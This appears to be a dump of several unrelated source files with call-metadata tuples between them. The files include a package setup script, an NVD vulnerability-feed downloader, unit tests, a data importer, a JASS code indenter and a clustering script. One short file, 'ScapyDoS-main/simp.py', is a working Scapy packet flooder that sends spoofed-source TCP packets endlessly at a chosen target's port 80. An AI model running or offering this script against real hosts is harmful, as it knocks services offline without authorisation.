'json.load', ({(150, 26, 150, 30): 'data'}, {}), '(data)', False, 'import json\n'), ((67, 12, 67, 54), 'shutil.rmtree', 'shutil.rmtree', ({(67, 26, 67, 53): "(setup['path'] + 'checkpoints')"}, {}), "(setup['path'] + 'checkpoints')", False, 'import shutil\n'), ((70, 12, 70, 47), 'shutil.rmtree', 'shutil.rmtree', ({(70, 26, 70, 46): "(setup['path'] + 'logs')"}, {}), "(setup['path'] + 'logs')", False, 'import shutil\n')] |
truggles/pudl | setup.py | 6f41664f8243b8f7aafdbbfc8522f96043dbf561 | #!/usr/bin/env python
"""Setup script to make PUDL directly installable with pip."""
import os
from pathlib import Path
from setuptools import find_packages, setup
install_requires = [
'coloredlogs',
'datapackage>=1.9.0',
'dbfread',
'goodtables',
'matplotlib',
'networkx>=2.2',
'numpy',
'pandas>=0.24',
'pyarrow>=0.14.0',
'pyyaml',
'scikit-learn>=0.20',
'scipy',
'sqlalchemy>=1.3.0',
'tableschema',
'tableschema-sql>=1.1.0',
'timezonefinder',
'xlsxwriter',
]
# We are installing the PUDL module to build the docs, but the C libraries
# required to build snappy aren't available on RTD, so we need to exclude it
# from the installed dependencies here, and mock it for import in docs/conf.py
# using the autodoc_mock_imports parameter:
if not os.getenv('READTHEDOCS'):
install_requires.append('python-snappy')
doc_requires = [
'doc8',
'sphinx',
'sphinx_rtd_theme',
]
test_requires = [
'bandit',
'coverage',
'doc8',
'flake8',
'flake8-docstrings',
'flake8-builtins',
'pep8-naming',
'pre-commit',
'pydocstyle',
'pytest',
'pytest-cov',
'nbval',
]
readme_path = Path(__file__).parent / "README.rst"
long_description = readme_path.read_text()
setup(
name='catalystcoop.pudl',
description='An open data processing pipeline for public US utility data.',
long_description=long_description,
long_description_content_type='text/x-rst',
use_scm_version=True,
author='Catalyst Cooperative',
author_email='[email protected]',
maintainer='Zane A. Selvans',
maintainer_email='[email protected]',
url="https://catalyst.coop/pudl",
project_urls={
"Source": "https://github.com/catalyst-cooperative/pudl",
"Documentation": "https://catalystcoop-pudl.readthedocs.io",
"Issue Tracker": "https://github.com/catalyst-cooperative/pudl/issues",
},
license='MIT',
keywords=[
'electricity', 'energy', 'data', 'analysis', 'mcoe', 'climate change',
'finance', 'eia 923', 'eia 860', 'ferc', 'form 1', 'epa ampd',
'epa cems', 'coal', 'natural gas', ],
python_requires='>=3.7, <3.8.0a0',
setup_requires=['setuptools_scm'],
install_requires=install_requires,
extras_require={
"doc": doc_requires,
"test": test_requires,
},
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
],
packages=find_packages('src'),
package_dir={'': 'src'},
# package_data is data that is deployed within the python package on the
# user's system. setuptools will get whatever is listed in MANIFEST.in
include_package_data=True,
# This defines the interfaces to the command line scripts we're including:
entry_points={
'console_scripts': [
'pudl_data = pudl.workspace.datastore_cli:main',
'pudl_setup = pudl.workspace.setup_cli:main',
'pudl_etl = pudl.cli:main',
'datapkg_to_sqlite = pudl.convert.datapkg_to_sqlite:main',
'ferc1_to_sqlite = pudl.convert.ferc1_to_sqlite:main',
'epacems_to_parquet = pudl.convert.epacems_to_parquet:main',
]
},
)
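# Usage sketch (not part of the original file): with the extras declared above,
# a development install typically looks like
#
#   pip install --editable .[doc,test]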
| [((33, 7, 33, 31), 'os.getenv', 'os.getenv', ({(33, 17, 33, 30): '"""READTHEDOCS"""'}, {}), "('READTHEDOCS')", False, 'import os\n'), ((57, 14, 57, 28), 'pathlib.Path', 'Path', ({(57, 19, 57, 27): '__file__'}, {}), '(__file__)', False, 'from pathlib import Path\n'), ((100, 13, 100, 33), 'setuptools.find_packages', 'find_packages', ({(100, 27, 100, 32): '"""src"""'}, {}), "('src')", False, 'from setuptools import find_packages, setup\n')] |
dermetfan/vulnix | src/vulnix/nvd.py | 06daccda0e51098fbdbc65f61b6663c5c6df9358 | from BTrees import OOBTree
from datetime import datetime, date, timedelta
from persistent import Persistent
from .vulnerability import Vulnerability
import fcntl
import glob
import gzip
import json
import logging
import os
import os.path as p
import requests
import transaction
import ZODB
import ZODB.FileStorage
DEFAULT_MIRROR = 'https://nvd.nist.gov/feeds/json/cve/1.1/'
DEFAULT_CACHE_DIR = '~/.cache/vulnix'
_log = logging.getLogger(__name__)
class NVD(object):
"""Access to the National Vulnerability Database.
https://nvd.nist.gov/
"""
def __init__(self, mirror=DEFAULT_MIRROR, cache_dir=DEFAULT_CACHE_DIR):
self.mirror = mirror.rstrip('/') + '/'
self.cache_dir = p.expanduser(cache_dir)
current = date.today().year
self.available_archives = [y for y in range(current-5, current+1)]
def lock(self):
self._lock = open(p.join(self.cache_dir, 'lock'), 'a')
try:
fcntl.lockf(self._lock, fcntl.LOCK_EX | fcntl.LOCK_NB)
except OSError:
_log.info('Waiting for NVD lock...')
fcntl.lockf(self._lock, fcntl.LOCK_EX)
def __enter__(self):
"""Keeps database connection open while in this context."""
_log.debug('Opening database in %s', self.cache_dir)
os.makedirs(self.cache_dir, exist_ok=True)
self.lock()
self._db = ZODB.DB(ZODB.FileStorage.FileStorage(
p.join(self.cache_dir, 'Data.fs')))
self._connection = self._db.open()
self._root = self._connection.root()
try:
self._root.setdefault('advisory', OOBTree.OOBTree())
self._root.setdefault('by_product', OOBTree.OOBTree())
self._root.setdefault('meta', Meta())
# may trigger exceptions if the database is inconsistent
list(self._root['by_product'].keys())
if 'archives' in self._root:
                _log.warning('Pre-1.9.0 database found - rebuilding')
self.reinit()
except (TypeError, EOFError):
            _log.warning('Incompatible objects found in database - rebuilding DB')
self.reinit()
return self
def __exit__(self, exc_type=None, exc_value=None, exc_tb=None):
if exc_type is None:
if self.meta.should_pack():
_log.debug('Packing database')
self._db.pack()
transaction.commit()
else:
transaction.abort()
self._connection.close()
self._db.close()
self._lock = None
def reinit(self):
"""Remove old DB and rebuild it from scratch."""
self._root = None
transaction.abort()
self._connection.close()
self._db = None
for f in glob.glob(p.join(self.cache_dir, "Data.fs*")):
os.unlink(f)
self._db = ZODB.DB(ZODB.FileStorage.FileStorage(
p.join(self.cache_dir, 'Data.fs')))
self._connection = self._db.open()
self._root = self._connection.root()
self._root['advisory'] = OOBTree.OOBTree()
self._root['by_product'] = OOBTree.OOBTree()
self._root['meta'] = Meta()
@property
def meta(self):
return self._root['meta']
def relevant_archives(self):
"""Returns list of NVD archives to check.
If there was an update within the last two hours, nothing is
done. If the last update was recent enough to be covered by
the 'modified' feed, only that is checked. Else, all feeds
are checked.
"""
last_update = self.meta.last_update
if last_update > datetime.now() - timedelta(hours=2):
return []
# the "modified" feed is sufficient if used frequently enough
if last_update > datetime.now() - timedelta(days=7):
return ['modified']
return self.available_archives
def update(self):
"""Download archives (if changed) and add CVEs to database."""
changed = []
for a in self.relevant_archives():
arch = Archive(a)
changed.append(arch.download(self.mirror, self.meta))
self.add(arch)
if any(changed):
self.meta.last_update = datetime.now()
self.reindex()
def add(self, archive):
advisories = self._root['advisory']
for (cve_id, adv) in archive.items():
advisories[cve_id] = adv
def reindex(self):
"""Regenerate product index."""
_log.info('Reindexing database')
del self._root['by_product']
bp = OOBTree.OOBTree()
for vuln in self._root['advisory'].values():
if vuln.nodes:
for prod in (n.product for n in vuln.nodes):
bp.setdefault(prod, [])
bp[prod].append(vuln)
self._root['by_product'] = bp
transaction.commit()
def by_id(self, cve_id):
"""Returns vuln or raises KeyError."""
return self._root['advisory'][cve_id]
def by_product(self, product):
"""Returns list of matching vulns or empty list."""
try:
return self._root['by_product'][product]
except KeyError:
return []
def affected(self, pname, version):
"""Returns list of matching vulnerabilities."""
res = set()
for vuln in self.by_product(pname):
if vuln.match(pname, version):
res.add(vuln)
return res
class Archive:
"""Single JSON data structure from NIST NVD."""
def __init__(self, name):
"""Creates JSON feed object.
`name` consists of a year or "modified".
"""
self.name = name
self.download_uri = 'nvdcve-1.1-{}.json.gz'.format(name)
self.advisories = {}
def download(self, mirror, meta):
"""Fetches compressed JSON data from NIST.
Nothing is done if we have already seen the same version of
the feed before.
Returns True if anything has been loaded successfully.
"""
url = mirror + self.download_uri
_log.info('Loading %s', url)
r = requests.get(url, headers=meta.headers_for(url))
r.raise_for_status()
if r.status_code == 200:
_log.debug('Loading JSON feed "%s"', self.name)
self.parse(gzip.decompress(r.content))
meta.update_headers_for(url, r.headers)
return True
else:
_log.debug('Skipping JSON feed "%s" (%s)', self.name, r.reason)
return False
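    # Note on the control flow in download(): requests does not raise on
    # HTTP 304 Not Modified, so raise_for_status() passes and the status_code
    # check routes unchanged feeds (conditional GET via the If-None-Match
    # header supplied by Meta.headers_for()) into the "skip" branch.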
def parse(self, nvd_json):
added = 0
raw = json.loads(nvd_json)
for item in raw['CVE_Items']:
try:
vuln = Vulnerability.parse(item)
self.advisories[vuln.cve_id] = vuln
added += 1
except ValueError:
_log.debug('Failed to parse NVD item: %s', item)
_log.debug("Added %s vulnerabilities", added)
def items(self):
return self.advisories.items()
class Meta(Persistent):
"""Metadate for database maintenance control"""
pack_counter = 0
last_update = datetime(1970, 1, 1)
etag = None
def should_pack(self):
self.pack_counter += 1
if self.pack_counter > 25:
self.pack_counter = 0
return True
return False
def headers_for(self, url):
"""Returns dict of additional request headers."""
if self.etag and url in self.etag:
return {'If-None-Match': self.etag[url]}
return {}
def update_headers_for(self, url, resp_headers):
"""Updates self from HTTP response headers."""
if 'ETag' in resp_headers:
if self.etag is None:
self.etag = OOBTree.OOBTree()
self.etag[url] = resp_headers['ETag']
| [((20, 7, 20, 34), 'logging.getLogger', 'logging.getLogger', ({(20, 25, 20, 33): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((217, 18, 217, 38), 'datetime.datetime', 'datetime', ({(217, 27, 217, 31): '1970', (217, 33, 217, 34): '1', (217, 36, 217, 37): '1'}, {}), '(1970, 1, 1)', False, 'from datetime import datetime, date, timedelta\n'), ((31, 25, 31, 48), 'os.path.expanduser', 'p.expanduser', ({(31, 38, 31, 47): 'cache_dir'}, {}), '(cache_dir)', True, 'import os.path as p\n'), ((41, 8, 41, 46), 'fcntl.lockf', 'fcntl.lockf', ({(41, 20, 41, 30): 'self._lock', (41, 32, 41, 45): 'fcntl.LOCK_EX'}, {}), '(self._lock, fcntl.LOCK_EX)', False, 'import fcntl\n'), ((46, 8, 46, 50), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((81, 8, 81, 27), 'transaction.abort', 'transaction.abort', ({}, {}), '()', False, 'import transaction\n'), ((90, 33, 90, 50), 'BTrees.OOBTree.OOBTree', 'OOBTree.OOBTree', ({}, {}), '()', False, 'from BTrees import OOBTree\n'), ((91, 35, 91, 52), 'BTrees.OOBTree.OOBTree', 'OOBTree.OOBTree', ({}, {}), '()', False, 'from BTrees import OOBTree\n'), ((134, 13, 134, 30), 'BTrees.OOBTree.OOBTree', 'OOBTree.OOBTree', ({}, {}), '()', False, 'from BTrees import OOBTree\n'), ((141, 8, 141, 28), 'transaction.commit', 'transaction.commit', ({}, {}), '()', False, 'import transaction\n'), ((199, 14, 199, 34), 'json.loads', 'json.loads', ({(199, 25, 199, 33): 'nvd_json'}, {}), '(nvd_json)', False, 'import json\n'), ((32, 18, 32, 30), 'datetime.date.today', 'date.today', ({}, {}), '()', False, 'from datetime import datetime, date, timedelta\n'), ((36, 26, 36, 56), 'os.path.join', 'p.join', ({(36, 33, 36, 47): 'self.cache_dir', (36, 49, 36, 55): '"""lock"""'}, {}), "(self.cache_dir, 'lock')", True, 'import os.path as p\n'), ((38, 12, 38, 66), 'fcntl.lockf', 'fcntl.lockf', ({(38, 24, 38, 34): 'self._lock', (38, 36, 38, 65): '(fcntl.LOCK_EX | fcntl.LOCK_NB)'}, {}), '(self._lock, fcntl.LOCK_EX | fcntl.LOCK_NB)', False, 'import fcntl\n'), ((71, 12, 71, 32), 'transaction.commit', 'transaction.commit', ({}, {}), '()', False, 'import transaction\n'), ((73, 12, 73, 31), 'transaction.abort', 'transaction.abort', ({}, {}), '()', False, 'import transaction\n'), ((84, 27, 84, 61), 'os.path.join', 'p.join', ({(84, 34, 84, 48): 'self.cache_dir', (84, 50, 84, 60): '"""Data.fs*"""'}, {}), "(self.cache_dir, 'Data.fs*')", True, 'import os.path as p\n'), ((85, 12, 85, 24), 'os.unlink', 'os.unlink', ({(85, 22, 85, 23): 'f'}, {}), '(f)', False, 'import os\n'), ((122, 36, 122, 50), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime, date, timedelta\n'), ((49, 12, 49, 45), 'os.path.join', 'p.join', ({(49, 19, 49, 33): 'self.cache_dir', (49, 35, 49, 44): '"""Data.fs"""'}, {}), "(self.cache_dir, 'Data.fs')", True, 'import os.path as p\n'), ((53, 46, 53, 63), 'BTrees.OOBTree.OOBTree', 'OOBTree.OOBTree', ({}, {}), '()', False, 'from BTrees import OOBTree\n'), ((54, 48, 54, 65), 'BTrees.OOBTree.OOBTree', 'OOBTree.OOBTree', ({}, {}), '()', False, 'from BTrees import OOBTree\n'), ((87, 12, 87, 45), 'os.path.join', 'p.join', ({(87, 19, 87, 33): 'self.cache_dir', (87, 35, 87, 44): '"""Data.fs"""'}, {}), "(self.cache_dir, 'Data.fs')", True, 'import os.path as p\n'), ((107, 25, 107, 39), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime, date, timedelta\n'), ((107, 42, 107, 60), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, date, timedelta\n'), ((110, 25, 110, 39), 
'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime, date, timedelta\n'), ((110, 42, 110, 59), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, date, timedelta\n'), ((190, 23, 190, 49), 'gzip.decompress', 'gzip.decompress', ({(190, 39, 190, 48): 'r.content'}, {}), '(r.content)', False, 'import gzip\n'), ((237, 28, 237, 45), 'BTrees.OOBTree.OOBTree', 'OOBTree.OOBTree', ({}, {}), '()', False, 'from BTrees import OOBTree\n')] |
Zusyaku/Termux-And-Lali-Linux-V2 | ScapyDoS-main/simp.py | b1a1b0841d22d4bf2cc7932b72716d55f070871e | from scapy.all import *
src = input("Source IP: ")
target = input("Target IP: ")
i=1
while True:
for srcport in range(1, 65535):
ip = IP(src=src, dst=target)
tcp = TCP(sport=srcport, dport=80)
pkt = ip / tcp
        send(pkt, inter=.0001)
print("Packet Sent ", i)
i=i+1 | [] |
azagajewski/ColiCoords | test/test_basic_functions.py | fa26e46971e24ff582c4d33331c5b8181f605c9f | import hashlib
import unittest
from colicoords.cell import Cell, CellList
from colicoords.preprocess import data_to_cells
from test import testcase
from test.test_functions import load_testdata
class DataTest(testcase.ArrayTestCase):
def setUp(self):
self.data = load_testdata('ds1')
def test_data_slicing(self):
sl1 = self.data[2:5, :, :]
self.assertEqual(sl1.shape, (3, 512, 512))
sl2 = self.data[:, 20:40, 100:200]
self.assertEqual(sl2.shape, (10, 20, 100))
def test_data_copy(self):
m0 = self.data.binary_img.mean()
data_copy = self.data.copy()
self.assertEqual(m0, self.data.binary_img.mean())
data_copy.data_dict['binary'] += 20
self.assertEqual(m0, self.data.binary_img.mean())
self.assertEqual(data_copy.binary_img.mean(), m0 + 20)
def _test_cell_list(self):
        # TODO: check order
        # md5 of the Data object itself raises TypeError; hash the underlying
        # binary image bytes instead.
        print(hashlib.md5(self.data.binary_img.tobytes()).hexdigest())
        cell_list = data_to_cells(self.data, initial_crop=2, cell_frac=0.5, rotate='binary')
        print(hashlib.md5(self.data.binary_img.tobytes()).hexdigest())
        cell_list = data_to_cells(self.data, initial_crop=2, cell_frac=0.5, rotate='binary')
        print(hashlib.md5(self.data.binary_img.tobytes()).hexdigest())
d = self.data.copy()
print(d == self.data)
cl = CellList(cell_list)
self.assertEqual(len(cl), 48)
c5 = cl[5]
self.assertIsInstance(c5, Cell)
del cl[5]
self.assertEqual(len(cl), 47)
self.assertTrue(cl[3] in cl)
cl.append(c5)
self.assertTrue(c5 in cl)
vol = cl.volume
self.assertEqual(len(vol), 48)
class CellListTest(testcase.ArrayTestCase):
def setUp(self):
data = load_testdata('ds1')
self.cell_list = data_to_cells(data)
def test_slicing(self):
sliced = self.cell_list[:5]
self.assertIsInstance(sliced, CellList)
if __name__ == '__main__':
unittest.main() | [((66, 4, 66, 19), 'unittest.main', 'unittest.main', ({}, {}), '()', False, 'import unittest\n'), ((11, 20, 11, 40), 'test.test_functions.load_testdata', 'load_testdata', ({(11, 34, 11, 39): '"""ds1"""'}, {}), "('ds1')", False, 'from test.test_functions import load_testdata\n'), ((32, 20, 32, 92), 'colicoords.preprocess.data_to_cells', 'data_to_cells', (), '', False, 'from colicoords.preprocess import data_to_cells\n'), ((34, 20, 34, 92), 'colicoords.preprocess.data_to_cells', 'data_to_cells', (), '', False, 'from colicoords.preprocess import data_to_cells\n'), ((40, 13, 40, 32), 'colicoords.cell.CellList', 'CellList', ({(40, 22, 40, 31): 'cell_list'}, {}), '(cell_list)', False, 'from colicoords.cell import Cell, CellList\n'), ((57, 15, 57, 35), 'test.test_functions.load_testdata', 'load_testdata', ({(57, 29, 57, 34): '"""ds1"""'}, {}), "('ds1')", False, 'from test.test_functions import load_testdata\n'), ((58, 25, 58, 44), 'colicoords.preprocess.data_to_cells', 'data_to_cells', ({(58, 39, 58, 43): 'data'}, {}), '(data)', False, 'from colicoords.preprocess import data_to_cells\n'), ((31, 14, 31, 36), 'hashlib.md5', 'hashlib.md5', ({(31, 26, 31, 35): 'self.data'}, {}), '(self.data)', False, 'import hashlib\n'), ((33, 14, 33, 36), 'hashlib.md5', 'hashlib.md5', ({(33, 26, 33, 35): 'self.data'}, {}), '(self.data)', False, 'import hashlib\n'), ((35, 14, 35, 36), 'hashlib.md5', 'hashlib.md5', ({(35, 26, 35, 35): 'self.data'}, {}), '(self.data)', False, 'import hashlib\n')] |
supsi-dacd-isaac/oasi-ozone-forecaster | data_importer_ftp.py | 01d23c374e857dcc6d556d073c0380186c2934d2 | # --------------------------------------------------------------------------- #
# Importing section
# --------------------------------------------------------------------------- #
import os
import sys
import argparse
import logging
import json
from classes.alerts import SlackClient
from influxdb import InfluxDBClient
from classes.data_manager import DataManager
# --------------------------------------------------------------------------- #
# Functions
# --------------------------------------------------------------------------- #
def slack_msg():
slack_client = SlackClient(logger, cfg)
if bool(dm.files_not_correctly_handled):
str_err = ''
for k in dm.files_not_correctly_handled:
str_err = '%sFailed handling of file %s; Exception: %s\n' % (str_err, k, dm.files_not_correctly_handled[k])
slack_client.send_alert_message('OZONE FORECASTER - RAW FILES ALARM:\n%s' % str_err, '#ff0000')
else:
slack_client.send_alert_message('OZONE FORECASTER - RAW FILES PROPERLY HANDLED', '#00ff00')
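# Assumed shape of dm.files_not_correctly_handled, inferred from the loop
# above (the file name and message are hypothetical):
#   {'raw_20210101.csv': 'ValueError: could not parse timestamp'}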
# --------------------------------------------------------------------------- #
# Main
# --------------------------------------------------------------------------- #
if __name__ == "__main__":
# --------------------------------------------------------------------------- #
# Configuration file
# --------------------------------------------------------------------------- #
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument("-c", help="configuration file")
arg_parser.add_argument("-l", help="log file (optional, if empty log redirected on stdout)")
args = arg_parser.parse_args()
config_file = args.c
if os.path.isfile(config_file) is False:
print('\nATTENTION! Unable to open configuration file %s\n' % config_file)
sys.exit(1)
cfg = json.loads(open(args.c).read())
conns_cfg = json.loads(open(cfg['connectionsFile']).read())
cfg.update(conns_cfg)
# --------------------------------------------------------------------------- #
# Set logging object
# --------------------------------------------------------------------------- #
if not args.l:
log_file = None
else:
log_file = args.l
logger = logging.getLogger()
logging.basicConfig(format='%(asctime)-15s::%(levelname)s::%(funcName)s::%(message)s', level=logging.INFO,
filename=log_file)
# --------------------------------------------------------------------------- #
# Starting program
# --------------------------------------------------------------------------- #
logger.info("Starting program")
# --------------------------------------------------------------------------- #
# InfluxDB connection
# --------------------------------------------------------------------------- #
logger.info('Connection to InfluxDb server on socket [%s:%s]' % (cfg['influxDB']['host'], cfg['influxDB']['port']))
try:
influx_client = InfluxDBClient(host=cfg['influxDB']['host'], port=cfg['influxDB']['port'],
password=cfg['influxDB']['password'], username=cfg['influxDB']['user'],
database=cfg['influxDB']['database'], ssl=cfg['influxDB']['ssl'])
except Exception as e:
logger.error('EXCEPTION: %s' % str(e))
sys.exit(3)
logger.info('Connection successful')
dm = DataManager(influx_client, cfg, logger)
# Download files from the FTP server
if cfg['ftp']['enabled'] is True:
logger.info('Download data from FTP server')
dm.open_ftp_connection()
dm.download_remote_files()
# Insert data into InfluxDB
if cfg['influxDB']['dataImporting'] is True:
logger.info('Importing in InfluxDB of raw data related to files in %s' % cfg['ftp']['localFolders']['tmp'])
dm.insert_data()
# Delete files correctly handled on the FTP server and close the FTP connection
if cfg['ftp']['enabled'] is True:
if cfg['ftp']['deleteRemoteFile'] is True:
logger.info('Delete handled files from FTP server')
dm.delete_remote_files()
dm.close_ftp_connection()
# Slack alert
if cfg['alerts']['slack']['enabled'] is True:
slack_msg()
logger.info("Ending program")
| [((20, 19, 20, 43), 'classes.alerts.SlackClient', 'SlackClient', ({(20, 31, 20, 37): 'logger', (20, 39, 20, 42): 'cfg'}, {}), '(logger, cfg)', False, 'from classes.alerts import SlackClient\n'), ((36, 17, 36, 42), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((58, 13, 58, 32), 'logging.getLogger', 'logging.getLogger', ({}, {}), '()', False, 'import logging\n'), ((59, 4, 60, 42), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((80, 9, 80, 48), 'classes.data_manager.DataManager', 'DataManager', ({(80, 21, 80, 34): 'influx_client', (80, 36, 80, 39): 'cfg', (80, 41, 80, 47): 'logger'}, {}), '(influx_client, cfg, logger)', False, 'from classes.data_manager import DataManager\n'), ((42, 7, 42, 34), 'os.path.isfile', 'os.path.isfile', ({(42, 22, 42, 33): 'config_file'}, {}), '(config_file)', False, 'import os\n'), ((44, 8, 44, 19), 'sys.exit', 'sys.exit', ({(44, 17, 44, 18): '(1)'}, {}), '(1)', False, 'import sys\n'), ((72, 24, 74, 104), 'influxdb.InfluxDBClient', 'InfluxDBClient', (), '', False, 'from influxdb import InfluxDBClient\n'), ((77, 8, 77, 19), 'sys.exit', 'sys.exit', ({(77, 17, 77, 18): '(3)'}, {}), '(3)', False, 'import sys\n')] |
gil9red/SimplePyScripts | autoindent_code_JASS_war3map_j.py | c191ce08fbdeb29377639184579e392057945154 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import re
DEBUG = False
def merge_str_literal(text: str) -> str:
def _on_match(m: re.Match):
return m.group().replace('"+"', '')
return re.sub(r'".+?"(\+".+?")+ ', _on_match, text)
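# Example of the merge (input string is hypothetical; the trailing space
# after the last literal is required by the pattern above):
#   merge_str_literal('set s="II1"+"I1_" x')  ->  'set s="II1I1_" x'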
lines = """
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
""".strip().splitlines()
stack = []
items = []
for line in lines:
if line.startswith('globals'):
stack.append('globals')
elif line.startswith('endglobals'):
stack.pop(-1)
stack.append('endglobals')
elif line.startswith('function'):
stack.append('function')
elif line.startswith('endfunction'):
stack.pop(-1)
stack.append('endfunction')
elif line.startswith('loop'):
stack.append('loop')
elif line.startswith('endloop'):
stack.pop(-1)
stack.append('endloop')
elif line.startswith('if'):
stack.append('if')
elif line.startswith('elseif'):
stack.pop(-1)
stack.append('elseif')
elif line.startswith('else'):
stack.pop(-1)
stack.append('else')
elif line.startswith('endif'):
stack.pop(-1)
stack.append('endif')
else:
stack.append(line[:8] + '...')
indent = len(stack) - 1
line = merge_str_literal(line)
items.append(' ' * indent + line)
DEBUG and print(f'{indent}. {line!r}', stack)
# Add empty line after endglobals and endfunction
if line.startswith('endglobals') or line.startswith('endfunction'):
items.append('')
if stack[-1] not in ['globals', 'function', 'loop', 'if', 'elseif', 'else']:
stack.pop(-1)
new_text = '\n'.join(items).strip()
print(new_text)
"""
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
"""
| [((17, 11, 17, 55), 're.sub', 're.sub', ({(17, 18, 17, 37): '"""".+?"(\\\\+".+?")+ """', (17, 39, 17, 48): '_on_match', (17, 50, 17, 54): 'text'}, {}), '(\'".+?"(\\\\+".+?")+ \', _on_match, text)', False, 'import re\n')] |
TruX-DTF/fixminer_source | python/addNewData.py | 5ab2d6f582743c377eadb21cd466a3a25809bc2d | from common.commons import *
DATA_PATH = os.environ["DATA_PATH"]
def core():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
# pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0]
pattern[root+'/'+size+'/'+cluster]= members[0]
pattern
from pairs import shapePairs
matches = shapePairs()
# 'FFmpeg','curl','nginx','openssl','redis','tmux','vlc']
matches = matches[matches.file.apply(lambda x: x in list(pattern.values()) or not ( x.startswith('linux_') or x.startswith('FFmpeg_') or x.startswith('curl_') or x.startswith('nginx_') or x.startswith('openssl_') or x.startswith('redis_') or x.startswith('tmux_') or x.startswith('vlc_')))]
from pairs import createPairs
createPairs(matches)
# # # elif job == 'importShapesPairs':
from pairs import importShape
importShape()
def checkWrongMembers():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
sizeDict = {}
for s in [(i,os.path.getsize(join(clusterPath, root, size, cluster,i))) for i in members]:
sizeDict[s[1]] = s[0]
sizeDict
if len(sizeDict) > 1:
print(join(clusterPath, root, size, cluster))
print(sizeDict.values())
def cluster():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
# pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0]
pattern[root+'/'+size+'/'+cluster]= members[0]
pattern
pairsPath = join(DATA_PATH, 'pairs')
from abstractPatch import loadPairMulti
for root in roots:
        matches = loadPairMulti(root, '', 'shapes')
matches
sizes = matches['sizes'].unique().tolist()
for s in sizes:
match = matches[matches['sizes'] == s]
match
clusterCore(pattern,clusterPath, 'shapes', match, pairsPath, root, s, '')
def clusterCore(pattern,clusterPath, level, match, pairsPath, root, s,action ,token=''):
col_combi = match.tuples.values.tolist()
import networkx
g = networkx.Graph(col_combi)
cluster = []
    # connected_component_subgraphs() was removed in networkx 2.4; build each
    # component subgraph explicitly instead.
    for nodes in networkx.connected_components(g):
        subgraph = g.subgraph(nodes)
        logging.info('Cluster size %d', len(subgraph.nodes()))
        cluster.append(list(subgraph.nodes()))
cluster
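    # Example: pairs [(1, 2), (2, 3), (7, 8)] form two connected components,
    # {1, 2, 3} and {7, 8}, i.e. two clusters.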
pathMapping = dict()
if level == 'actions':
indexFile = join(pairsPath, root, s,action+'.index')
elif level == 'shapes':
indexFile = join(pairsPath, root, s + '.index')
else:
        indexFile = join(pairsPath, root, s, action, token + '.index')
df = pd.read_csv(indexFile, header=None, usecols=[0, 1], index_col=[0])
pathMapping = df.to_dict()
workList = []
exportCLusters ={}
if not os.path.exists(join(clusterPath, root, s)):
print()
existingClusters = 0
else:
existingClusters = len(listdir(join(clusterPath, root, s)))
for clus in cluster:
members = [pathMapping[1][int(i)] for i in clus]
members
potentialClusters = [(key, value) for key, value in pattern.items() if key.startswith(root + '/' + s)]
potentialClusters
foundExisting = False
for pc,pcMember in potentialClusters:
if pcMember in members:
pc
foundExisting = True
exportCLusters[pc.split('/')[-1]] = members
if not foundExisting:
exportCLusters[existingClusters] = members
existingClusters= existingClusters+1
exportCLusters
for k,v in exportCLusters.items():
for f in v:
t = f, root, level, clusterPath, s, action, token, k
workList.append(t)
